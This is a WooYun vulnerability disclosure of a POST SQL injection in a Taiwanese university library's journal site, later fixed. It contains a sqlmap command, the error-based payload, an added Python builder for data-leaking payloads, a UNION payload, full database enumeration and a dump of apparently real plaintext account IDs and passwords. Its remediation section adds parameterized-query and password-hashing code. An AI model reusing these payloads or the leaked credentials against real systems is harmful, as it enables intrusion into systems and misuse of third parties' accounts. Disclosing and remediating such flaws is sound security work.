
Vulnerability summary

Defect ID: wooyun-2015-0156854

Title: POST-type SQL injection in the 國立臺中科技大學圖書館 (National Taichung University of Science and Technology Library) (tens of thousands of system records, backup files, plaintext user passwords) (Taiwan region)

Affected vendor: 國立臺中科技大學圖書館

Author: 路人甲

Submitted: 2015-12-01 11:31

Fixed: 2016-01-05 19:08

Published: 2016-01-05 19:08

Type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (Hitcon Taiwan Internet vulnerability reporting platform) for handling

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability details

Disclosure status:

2015-12-01: Details sent to the vendor, awaiting vendor handling
2015-12-02: Vendor confirmed; details visible to the vendor only
2015-12-12: Details disclosed to core white hats and domain experts
2015-12-22: Details disclosed to regular white hats
2016-01-01: Details disclosed to intern white hats
2016-01-05: Vendor fixed the vulnerability and disclosed it proactively; details public

Brief description:

1. Vision
Guided by the vision of cultivating well-rounded talent, provide professional library services and build a learning environment of college-wide integration and collaborative growth.

2. Goals
1. Space: create a high-quality space
2. Collections: build comprehensive resources
3. Expertise: advance professional knowledge and skills
4. Management: improve management effectiveness
5. Digital: strengthen digital content
6. Service: provide refined service

Detailed description:

URL: http://**.**.**.**/database/search/ejournal/JournalList_user.asp

$ python sqlmap.py -u "http://**.**.**.**/database/search/ejournal/JournalList_user.asp" -p Language --technique=BE --form --random-agent --batch -D EDB -T Main -C ID,Password --dump


Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |


Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 13660 |


Database: EDB
Table: Main
[9 entries]
+-------------+-----------------+
| ID | Password |
+-------------+-----------------+
| 100325531 | camiojc |
| 103udndata | 103udndata |
| college93 | college93 |
| guest | guest |
| ntit | ntitlib |
| reviewer | 4filibusters356 |
| taiwantrial | 2010trial |
| user0011 | user0011 |
| 自訂 | 自訂 |
+-------------+-----------------+

Proof:

---
Parameter: Language (POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: MoveUp=%E4%B8%8A%E4%B8%80%E9%A0%81&ListType=QAsR&ListString=&DisplayNumber=20&Language=djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx&select_way=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
current user: 'edbsa1'
current user is DBA: False
database management system users [2]:
[*] edbsa1
[*] sa
database management system users password hashes:
[*] edbsa1 [1]:
password hash: NULL
[*] sa [1]:
password hash: NULL
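How the error-based payload above leaks data, as an added Python example that is not part of the original report. The marker strings (CHAR(113)+CHAR(118)+... = qvvjq and qkvxq), the CONVERT(INT, ...) shape and the CASE oracle (CHAR(49)/CHAR(48)) are taken from the payload on this page; the error page it parses is a constructed sample in the format a classic ASP application returns when SQL Server error 245 fires, and no request is actually sent. The NULL hashes above are what a login without permission to read sys.sql_logins gets back; the same extraction works for anything the edbsa1 login can SELECT.

```python
import re
from typing import List, Optional

# Injection payload recorded by sqlmap on this page (the Language POST parameter).
# Both boundary markers are spelled as CHAR() concatenations so the subquery
# needs no quote character of its own.
PAGE_PAYLOAD = (
    "djEV' AND 9659=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(106)+CHAR(113)"
    "+(SELECT (CASE WHEN (9659=9659) THEN CHAR(49) ELSE CHAR(48) END))"
    "+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(120)+CHAR(113))) AND 'hHLx'='hHLx"
)

# Constructed sample (not captured from the target) of the error page classic ASP
# shows when CONVERT(INT, 'qvvjq' + value + 'qkvxq') fails: error 245 echoes the
# offending string, and with it the value, back to the client.
SAMPLE_ERROR_PAGE = (
    "Microsoft OLE DB Provider for SQL Server error '80040e07'\n"
    "Conversion failed when converting the nvarchar value 'qvvjqEDBqkvxq' to data type int.\n"
)

CHAR_RUN = re.compile(r"CHAR\(\d+\)(?:\+CHAR\(\d+\))*")


def decode_char_concat(expr: str) -> str:
    """'CHAR(113)+CHAR(118)' -> 'qv'."""
    return "".join(chr(int(n)) for n in re.findall(r"CHAR\((\d+)\)", expr))


def payload_markers(payload: str) -> List[str]:
    """Every CHAR() run in the payload, decoded. For the page's payload the first
    and last runs are the boundary markers; the two single characters between
    them are the CASE branches, i.e. the true/false oracle."""
    return [decode_char_concat(m.group(0)) for m in CHAR_RUN.finditer(payload)]


def to_char_concat(s: str) -> str:
    """Inverse of decode_char_concat: 'qkvxq' -> 'CHAR(113)+CHAR(107)+...'."""
    return "+".join(f"CHAR({ord(c)})" for c in s)


def build_error_payload(subquery: str, prefix: str = "qvvjq", suffix: str = "qkvxq") -> str:
    """Same shape as the page's payload, with an arbitrary scalar subquery in place
    of the CASE expression. The server tries to convert prefix+value+suffix to
    INT, fails, and the error message carries the value. 'hHLx' re-closes the
    string literal exactly as sqlmap's payload did."""
    return (
        f"' AND 9659=CONVERT(INT,(SELECT {to_char_concat(prefix)}+({subquery})"
        f"+{to_char_concat(suffix)})) AND 'hHLx'='hHLx"
    )


def extract_value(page: str, prefix: str = "qvvjq", suffix: str = "qkvxq") -> Optional[str]:
    """Value between the markers in the returned page, or None when no conversion
    error carrying our markers came back (the injection did not fire)."""
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), page, re.S)
    return m.group(1) if m else None


def oracle_result(page: str) -> Optional[bool]:
    """Read the page's CASE oracle: CHAR(49)='1' means the condition held."""
    v = extract_value(page)
    return None if v is None else v == "1"


if __name__ == "__main__":
    print(payload_markers(PAGE_PAYLOAD))            # ['qvvjq', '1', '0', 'qkvxq']
    print(build_error_payload("SELECT DB_NAME()"))  # payload that leaks the current database name
    print(extract_value(SAMPLE_ERROR_PAGE))         # EDB
```

The error message has a length limit, which is why sqlmap pulls long values out in SUBSTRING slices rather than in one request; the marker pair is what lets it find its own output inside an otherwise unrelated error page.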
Database: EDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.ClassifiedByCollege | 1248 |
| dbo.ClassifiedBySubject | 1009 |
| dbo.ClassifiedByDataType | 537 |
| dbo.Main | 472 |
| dbo.Main_20150128 | 434 |
| dbo.ClassifiedByCollege_20120209 | 332 |
| dbo.TrialSurveyDept | 41 |
| dbo.DataType | 22 |
| dbo.IDAskFor | 17 |
| dbo.Subject | 7 |
| dbo.College | 6 |
| dbo.DatabaseType | 6 |
| dbo.FunctionName | 6 |
| dbo.JournalCoverage | 6 |
| dbo.Status | 6 |
| dbo.College_20120209 | 5 |
| dbo.Survey | 5 |
| dbo.AccessArea | 4 |
| dbo.Platform | 3 |
| dbo.Proxy | 3 |
+--------------------------------------------------+---------+
Database: EJournal
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Main | 73130 |
| dbo.Main_9 | 70765 |
| dbo.Main_20140121 | 63236 |
| dbo.Main_20150420 | 59129 |
| dbo.main_20120928 | 56744 |
| dbo.main_20110629 | 34278 |
| dbo.sheet1$ | 30699 |
| dbo.電子期刊上傳_BSC2015 | 20395 |
| dbo.電子期刊上傳_華藝 | 13179 |
| dbo.電子期刊上傳_CJTD2015 | 8545 |
| dbo.電子期刊上傳_萬方期刊清單7774刊 | 7774 |
| dbo.電子期刊上傳_ASP2015 | 6126 |
| dbo.電子期刊上傳_CEPS2015 | 4634 |
| dbo.電子期刊上傳_Ecolit2015 | 3042 |
| dbo.電子期刊上傳_OmniFile2015 | 2862 |
| dbo.電子期刊上傳_SDOL2015 | 2221 |
| dbo.電子期刊清單_SDOL | 2221 |
| dbo.電子期刊上傳_ASTS2015 | 1598 |
| dbo.電子期刊上傳_Medline2015 | 1458 |
| dbo.西文電子期刊上傳_ABIR | 1343 |
| dbo.電子期刊上傳_ABIR2015 | 1343 |
| dbo.ACM | 1140 |
| dbo.電子期刊上傳_ACM | 1140 |
| dbo.電子期刊上傳_Hyread2015 | 1136 |
| dbo.西文電子期刊上傳_EJ | 1119 |
| dbo.電子期刊上傳_EJ2015 | 1119 |
| dbo.西文電子期刊清單VSP | 1011 |
| dbo.CJFD期刊清單 | 846 |
| dbo.[電子期刊上傳_PQ-Nursing2015] | 793 |
| dbo.ProQuest | 793 |
| dbo.電子期刊上傳_CINAHL2015 | 760 |
| dbo.電子期刊上傳_PDC2015 | 709 |
| dbo.電子期刊上傳_CMMC2015 | 642 |
| dbo.電子期刊上傳_JSTOR2015 | 600 |
| dbo.電子期刊上傳_PAO | 547 |
| dbo.電子期刊上傳_Library2015 | 368 |
| dbo.電子期刊上傳_SOJA | 259 |
| dbo.電子期刊上傳_MagV2015 | 170 |
| dbo.電子期刊上傳_摩達網 | 170 |
| dbo.[電子期刊上傳-華藝雜誌124種] | 124 |
| dbo.電子期刊上傳_WSPC2015 | 116 |
| dbo.[0522_EM60-2015] | 80 |
| dbo.電子期刊上傳_OJDA | 71 |
| dbo.DB | 63 |
| dbo.電子期刊上傳_華藝雜誌 | 37 |
| dbo.[IEEE CSDL] | 35 |
| dbo.[電子期刊上傳_IEEE CSDL] | 35 |
| dbo.電子期刊上傳_Acer2015 | 27 |
| dbo.[電子期刊上傳_2016中文電子期刊清單-Hyread-app] | 18 |
| dbo.電子期刊上傳_GreenFILE2015 | 14 |
| dbo.Source | 12 |
| dbo.電子期刊上傳_華藝精選電子雜誌 | 10 |
| dbo.西文電子期刊上傳_vogue | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 98318 |
| sys.sysmessages | 98318 |
| sys.fulltext_system_stopwords | 15829 |
| sys.syscolumns | 11966 |
| sys.all_parameters | 7090 |
| sys.system_parameters | 7090 |
| sys.trace_subclass_values | 5366 |
| sys.all_columns | 4670 |
| sys.system_columns | 4626 |
| sys.trace_event_bindings | 4304 |
| sys.syscomments | 2994 |
| dbo.spt_values | 2508 |
| sys.all_objects | 1934 |
| sys.sysobjects | 1934 |
| sys.system_objects | 1928 |
| sys.database_permissions | 1844 |
| sys.syspermissions | 1844 |
| sys.sysprotects | 1843 |
| sys.all_sql_modules | 1783 |
| sys.system_sql_modules | 1783 |
| sys.dm_audit_actions | 454 |
| sys.spatial_reference_systems | 390 |
| sys.event_notification_event_types | 365 |
| sys.all_views | 354 |
| sys.system_views | 354 |
| sys.trigger_event_types | 245 |
| sys.trace_events | 180 |
| sys.allocation_units | 128 |
| sys.partitions | 116 |
| sys.syscharsets | 114 |
| sys.xml_schema_facets | 112 |
| sys.xml_schema_components | 99 |
| sys.system_components_surface_area_configuration | 95 |
| sys.dm_audit_class_type_map | 83 |
| sys.xml_schema_types | 82 |
| sys.configurations | 68 |
| sys.sysconfigures | 68 |
| sys.syscurconfigs | 68 |
| sys.trace_columns | 66 |
| INFORMATION_SCHEMA.COLUMNS | 44 |
| sys.columns | 44 |
| sys.systypes | 34 |
| sys.types | 34 |
| sys.syslanguages | 33 |
| sys.securable_classes | 22 |
| sys.trace_categories | 21 |
| sys.xml_schema_component_placements | 18 |
| sys.xml_schema_attributes | 15 |
| sys.database_principals | 14 |
| sys.sysusers | 14 |
| INFORMATION_SCHEMA.SCHEMATA | 13 |
| sys.database_mirroring | 13 |
| sys.database_recovery_status | 13 |
| sys.databases | 13 |
| sys.schemas | 13 |
| sys.sysdatabases | 13 |
| sys.server_principals | 11 |
| sys.service_contract_message_usages | 11 |
| sys.server_permissions | 7 |
| sys.sysindexes | 7 |
| sys.indexes | 6 |
| sys.objects | 6 |
| sys.stats_columns | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| INFORMATION_SCHEMA.TABLES | 5 |
| sys.index_columns | 5 |
| sys.sysindexkeys | 5 |
| sys.tables | 5 |
| sys.endpoints | 4 |
| sys.assembly_types | 3 |
| sys.service_queue_usages | 3 |
| sys.stats | 3 |
| sys.type_assembly_usages | 3 |
| sys.xml_schema_namespaces | 3 |
| sys.database_files | 2 |
| sys.login_token | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sysfiles | 2 |
| sys.syslogins | 2 |
| sys.user_token | 2 |
| dbo.spt_monitor | 1 |
| sys.assemblies | 1 |
| sys.assembly_files | 1 |
| sys.data_spaces | 1 |
| sys.database_role_members | 1 |
| sys.default_constraints | 1 |
| sys.dm_exec_requests | 1 |
| sys.dm_exec_sessions | 1 |
| sys.filegroups | 1 |
| sys.server_role_members | 1 |
| sys.servers | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysmembers | 1 |
| sys.sysprocesses | 1 |
| sys.sysservers | 1 |
| sys.tcp_endpoints | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.backupfile | 13660 |
| dbo.backupmediafamily | 6830 |
| dbo.backupmediaset | 6830 |
| dbo.backupset | 6830 |
| dbo.syspolicy_configuration | 4 |
| dbo.restorefile | 2 |
| dbo.restorefilegroup | 1 |
| dbo.restorehistory | 1 |
+--------------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: EDB
Table: Main
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: EDB
Table: Main_20150128
[1 column]
+----------+---------+
| Column | Type |
+----------+---------+
| Password | varchar |
+----------+---------+
Database: master
Table: sysoledbusers
[1 column]
+-------------+----------+
| Column | Type |
+-------------+----------+
| rmtpassword | nvarchar |
+-------------+----------+
Database: master
Table: syslogins
[1 column]
+----------+----------+
| Column | Type |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: master
Table: sysusers
[1 column]
+----------+-----------+
| Column | Type |
+----------+-----------+
| password | varbinary |
+----------+-----------+
Database: master
Table: sql_logins
[1 column]
+---------------+-----------+
| Column | Type |
+---------------+-----------+
| password_hash | varbinary |
+---------------+-----------+
Database: msdb
Table: backupset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: msdb
Table: backupmediaset
[1 column]
+-----------------------+------+
| Column | Type |
+-----------------------+------+
| is_password_protected | bit |
+-----------------------+------+
Database: EDB
Table: Main
[9 entries]
+-----------------+
| Password |
+-----------------+
| 103udndata |
| 2010trial |
| 4filibusters356 |
| camiojc |
| college93 |
| guest |
| ntitlib |
| user0011 |
| 自訂 |
+-----------------+
Database: EDB
Table: Main_20150128
[9 entries]
+-----------------+
| Password |
+-----------------+
| 103udndata |
| 2010trial |
| 4filibusters356 |
| camiojc |
| college93 |
| guest |
| ntitlib |
| user0011 |
| 自訂 |
+-----------------+
Database: msdb
Table: backupset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
Database: msdb
Table: backupmediaset
[1 entry]
+-----------------------+
| is_password_protected |
+-----------------------+
| 0 |
+-----------------------+
Database: EDB
Table: Main
[40 columns]
+-----------------------+----------+
| Column | Type |
+-----------------------+----------+
| AccessAreaNum | int |
| AccessMode | varchar |
| AllocatedDisk | varchar |
| Annotate | nvarchar |
| Back_up | char |
| BackupYear | varchar |
| ConcurrentUser | nvarchar |
| DatabaseType | varchar |
| DataCoverage | nvarchar |
| Deadline | datetime |
| Domain | varchar |
| EarlyCDROM | char |
| EarlyCDROMYear | varchar |
| ErrorConnection | int |
| FulltextViewer | varchar |
| Guide | nvarchar |
| ID | varchar |
| IDAskForNum | int |
| InvalidAccessdatetime | datetime |
| Item | int |
| Language | nvarchar |
| Movie | nvarchar |
| Note | nvarchar |
| OperationSystem | varchar |
| Password | varchar |
| PlatformNum | int |
| Producer | nvarchar |
| ProxyNum | int |
| SharedFolder | varchar |
| Sort | char |
| Source | varchar |
| StatusNum | int |
| SubjectCoverage | nvarchar |
| SurveyNum | int |
| SurveyURL | varchar |
| TimeCoverage | nvarchar |
| Title | nvarchar |
| Updatedate | datetime |
| UpdateFrequency | varchar |
| Vendor | varchar |
+-----------------------+----------+

Remediation:

Deploy a WAF.

A WAF only masks the bug. JournalList_user.asp still splices the Language POST parameter into its SQL text; the fix is a parameterized query (in classic ASP, an ADODB.Command with bound parameters) for every user-controlled value the page uses. The EDB.Main and Main_20150128 tables store database account passwords in plaintext; they should hold a salted password hash instead, and the credentials dumped above should be rotated. The edbsa1 login, although not sysadmin, could enumerate master and msdb (including the backup history); it should be limited to the EDB objects the page actually needs.
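What the remediation amounts to in code, as an added example that is not the library's own source. The vulnerable function mirrors the pattern the finding implies (the Language value pasted into the SQL string); the safe one binds it as a parameter. sqlite3 stands in for SQL Server 2008 so the block runs offline (hence || rather than + in the UNION payload), the Main rows and passwords are constructed, and the PBKDF2 functions show the storage the EDB.Main Password column should have instead of plaintext.

```python
import hashlib
import hmac
import os
import sqlite3
from typing import List, Optional, Tuple

# Constructed rows standing in for EDB.dbo.Main (column names from the page's
# schema dump; the values are made up, not the leaked ones).
SAMPLE_ROWS = [
    ("guest",    "guest-pw",    "en", "Example database A"),
    ("reviewer", "reviewer-pw", "zh", "Example database B"),
]


def make_db() -> sqlite3.Connection:
    """In-memory sqlite3 database playing the role of SQL Server 2008."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Main (ID TEXT, Password TEXT, Language TEXT, Title TEXT)")
    conn.executemany("INSERT INTO Main VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def list_titles_vulnerable(conn: sqlite3.Connection, language: str) -> List[Tuple[str]]:
    """The pattern behind the finding: the POST value becomes part of the SQL text,
    so a quote in it ends the literal and everything after it is executed as SQL."""
    sql = "SELECT Title FROM Main WHERE Language = '" + language + "'"
    return conn.execute(sql).fetchall()


def list_titles_safe(conn: sqlite3.Connection, language: str) -> List[Tuple[str]]:
    """Parameterized form (classic ASP equivalent: ADODB.Command plus a Parameters
    entry). The value travels separately from the statement; quotes in it are data."""
    return conn.execute("SELECT Title FROM Main WHERE Language = ?", (language,)).fetchall()


# Attack string: closes the literal and appends a UNION that returns ID and Password.
# sqlite concatenates with ||; on SQL Server the same idea is written with +.
UNION_PAYLOAD = "x' UNION SELECT ID || ':' || Password FROM Main WHERE '1'='1"


# ---- password storage: what EDB.Main.Password should hold instead of plaintext ----

def hash_password(password: str, salt: Optional[bytes] = None, iterations: int = 200_000) -> str:
    """PBKDF2-HMAC-SHA256 with a random 16-byte salt, in a self-describing encoding."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    except ValueError:
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


def demo() -> dict:
    """Run the same payload through both query styles."""
    conn = make_db()
    return {
        "vulnerable": sorted(list_titles_vulnerable(conn, UNION_PAYLOAD)),
        "safe": list_titles_safe(conn, UNION_PAYLOAD),
        "safe_normal": list_titles_safe(conn, "en"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

With the concatenated query the UNION payload returns every ID:Password pair, which is exactly the dump shown in this report; with the bound parameter the same string is just a Language value that matches nothing. Hashing only helps the accounts whose passwords are not also needed in clear by the application, so credentials the page has to hand to a remote vendor belong in a secrets store, not in a user-readable table.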

Copyright notice: when reproducing, credit the source as 路人甲@乌云 (WooYun).


Vendor response

Vendor response:

Severity: High

Rank: 15

Confirmed: 2015-12-02 15:56

Vendor reply:

Thank you for the report.

Latest status:

2016-01-05: Fix confirmed